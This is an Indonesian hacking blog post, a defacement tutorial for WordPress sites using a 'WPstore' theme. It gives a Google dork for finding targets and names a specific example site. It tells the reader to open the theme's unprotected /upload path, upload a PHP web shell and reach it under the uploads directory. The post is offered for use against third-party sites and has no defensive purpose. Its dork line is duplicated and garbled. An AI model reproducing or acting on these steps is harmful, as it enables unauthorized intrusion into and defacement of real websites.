Dah lama gak posting nih blog wkwkw :v
saya mau kasih tutorial depes lagi kali ini CMSnya Wordpress
langsung aja
Dork :
inurl:/wp-content/themes/WPstore /inurl:"/?page=store" site:.comsaya mau kasih tutorial depes lagi kali ini CMSnya Wordpress
langsung aja
Dork :
kita ambil contoh: http://www.pgreports.co.uk/?page=store
nah kalo udah kita ctrl+u :v
kita liat wordpress bukan dan themanya apaa :v
http://www.pgreports.co.uk/wp-content/themes/Store/style.css
kita ganti URLnya menjadi
http://www.pgreports.co.uk/wp-content/themes/Store/upload
kalo begitu ada tombol uploadnya langsung aja pilih shell ente
langsung upload shell ada di direktori
http://www.pgreports.co.uk/wp-content/uploads/products_img/shell.php (Note: not all website are vulnerable in this exploit)
0 comments:
Post a Comment